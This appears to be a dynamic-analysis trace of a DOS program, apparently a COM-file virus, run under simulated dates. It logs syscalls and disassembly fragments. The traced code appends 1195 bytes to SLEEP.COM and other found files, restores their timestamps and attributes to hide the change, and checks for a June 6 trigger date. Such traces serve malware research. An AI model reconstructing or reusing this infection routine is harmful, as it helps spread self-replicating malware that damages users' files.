2018-12-25T11:48:41.783190978Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.789514074Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.799813447Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.806452698Z 44 PC: 12c9e | Get time
0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.808688316Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:41.828098573Z 62 PC: 12cbc | Close file
2018-12-25T11:48:41.830253302Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.837151311Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:41.844696885Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.858696422Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:41.862117148Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:41.86507469Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:41.874555945Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:41.876048772Z 62 PC: 12d21 | Close file
2018-12-25T11:48:41.884339119Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:41.910682012Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:41.914447779Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:41.921458179Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:41.930819067Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:41.932948069Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:41.942996251Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:41.94526881Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:41.951890219Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:41.954871297Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:41.958407553Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:41.961399544Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:41.963321002Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:41.97355736Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:41.975057435Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:41.982443374Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.004247386Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:42.006769814Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.010956202Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.015729001Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.017291485Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.023613638Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.025460635Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.032450538Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:42.036977412Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.03942267Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.041273273Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.042650928Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.048639357Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.050064482Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.055326059Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.062186214Z 42 PC: 12b53 | Get date
0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:42.063793833Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:42.066590337Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:41.954821915Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:41.963123275Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:41.96738541Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:41.969177821Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:41.982942616Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:41.98925865Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:41.99538673Z 44 PC: 12c9e | Get time
0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:41.997608345Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:42.033657935Z 62 PC: 12cbc | Close file
2018-12-25T11:48:42.035434263Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:42.042581917Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:42.045762143Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:42.048645019Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:42.051535903Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:42.054608698Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:42.064196281Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:42.065908083Z 62 PC: 12d21 | Close file
2018-12-25T11:48:42.074718877Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:42.084601964Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:42.087617855Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.09540337Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.102567422Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.105238494Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.113738377Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.115364078Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.120823665Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:42.13092304Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.13866447Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.141931597Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.144745056Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.154183858Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.158064543Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.166346495Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.177061611Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:42.179888599Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:42.186278058Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:42.193511622Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:42.19570769Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:42.212567363Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:42.215495665Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:42.222319818Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:42.22535778Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:42.228810484Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:42.231747452Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:42.234647769Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:42.244390321Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:42.24620482Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:42.253816764Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:42.264617043Z 42 PC: 12b53 | Get date
0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:42.267219471Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:42.271393601Z 59 PC: 12db4 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":3146,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:48:42.282773585Z 71 PC: 12b2d | Get current directory
2018-12-25T11:48:42.286547828Z 59 PC: 12b38 | Change current directory
2018-12-25T11:48:42.29103603Z 26 PC: 12beb | Set disk transfer address
2018-12-25T11:48:42.292252785Z 78 PC: 12bf9 | Find first file
2018-12-25T11:48:42.311477283Z 61 PC: 12c24 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:42.320475517Z 63 PC: 12c36 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T11:48:42.327657923Z 44 PC: 12c9e | Get time
0x12c9e: add dl, dh
0x12ca0: je 0x12c9a
0x12ca2: mov si, 0x115
0x12ca5: add si, word ptr [0x106]
0x12ca9: mov byte ptr [si], dl
0x12cab: mov ax, 0x4301
0x12cae: xor cx, cx
0x12cb0: mov dx, si
0x12cb2: add dx, 0xb4
0x12cb6: int 0x21
0x12cb8: mov ah, 0x3e
0x12cba: int 0x21
0x12cbc: mov ax, 0x3d02
0x12cbf: int 0x21
0x12cc1: jb 0x12c45
0x12cc3: mov di, dx
0x12cc5: add di, 0x5d
0x12cc8: stosw word ptr es:[di], ax
0x12cc9: xchg ax, bx
0x12cca: mov ah, 0x40
2018-12-25T11:48:42.330050977Z 67 PC: 12cb8 | Get or set file attributes
2018-12-25T11:48:43.480525507Z 62 PC: 12cbc | Close file
2018-12-25T11:48:43.48247729Z 61 PC: 12cc1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:48:43.489884769Z 64 PC: 12cd4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T11:48:43.493213303Z 64 PC: 12ce6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:43.49593481Z 64 PC: 12cfb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T11:48:43.498658926Z 66 PC: 12d04 | Move file pointer
2018-12-25T11:48:43.501003016Z 64 PC: 12a82 | Write file or device (Write 1195 bytes on handle 5)
2018-12-25T11:48:43.640955461Z 87 PC: 12d1d | Get or set file date and time
2018-12-25T11:48:43.647799552Z 62 PC: 12d21 | Close file
2018-12-25T11:48:43.661648085Z 67 PC: 12d32 | Get or set file attributes
2018-12-25T11:48:43.676579907Z 79 PC: 12c0c | Find next file
2018-12-25T11:48:43.679874744Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:43.689893937Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:43.698071399Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:43.700736866Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:43.728240534Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:43.730730231Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:43.738748644Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:43.741729158Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:43.74487962Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:43.747689776Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:43.749984992Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:43.780526444Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:43.78213002Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:43.82110345Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:43.848271805Z 79 PC: 12c0c | Find next file (See above)
2018-12-25T11:48:43.851174927Z 61 PC: 12c24 | Open file (See above)
2018-12-25T11:48:43.859385866Z 63 PC: 12c36 | Read file or device (See above)
2018-12-25T11:48:43.868978845Z 44 PC: 12c9e | Get time (See above)
2018-12-25T11:48:43.872333938Z 67 PC: 12cb8 | Get or set file attributes (See above)
2018-12-25T11:48:43.897609988Z 62 PC: 12cbc | Close file (See above)
2018-12-25T11:48:43.899814059Z 61 PC: 12cc1 | Open file (See above)
2018-12-25T11:48:43.907494838Z 64 PC: 12cd4 | Write file or device (See above)
2018-12-25T11:48:43.911253699Z 64 PC: 12ce6 | Write file or device (See above)
2018-12-25T11:48:43.914034789Z 64 PC: 12cfb | Write file or device (See above)
2018-12-25T11:48:43.917189042Z 66 PC: 12d04 | Move file pointer (See above)
2018-12-25T11:48:43.919281857Z 64 PC: 12a82 | Write file or device (See above)
2018-12-25T11:48:43.942600541Z 87 PC: 12d1d | Get or set file date and time (See above)
2018-12-25T11:48:43.945216936Z 62 PC: 12d21 | Close file (See above)
2018-12-25T11:48:43.990138191Z 67 PC: 12d32 | Get or set file attributes (See above)
2018-12-25T11:48:44.031384992Z 42 PC: 12b53 | Get date
0x12b53: cmp dx, 0x606
0x12b57: je 0x12b5c
0x12b59: jmp 0x12da2
0x12b5c: jmp 0x12d37
0x12b5f: and ah, bh
0x12b61: movsw word ptr es:[di], word ptr [si]
0x12b62: mov ax, 0x5c4c
0x12b65: add word ptr [di], ax
0x12b67: add byte ptr [di - 0x75], dl
0x12b6a: in al, dx
0x12b6b: sub sp, 0x2c
0x12b6e: push si
0x12b6f: jmp 0x12be0
0x12b71: mov ah, 0x1a
0x12b73: lea dx, word ptr [bp - 0x2c]
0x12b76: int 0x21
0x12b78: mov ah, 0x4e
0x12b7a: mov cx, 0x10
0x12b7d: mov dx, 0x1a2
0x12b80: add dx, word ptr [0x106]
2018-12-25T11:48:44.035135719Z 59 PC: 12dad | Change current directory
2018-12-25T11:48:44.038357186Z 59 PC: 12db4 | Change current directory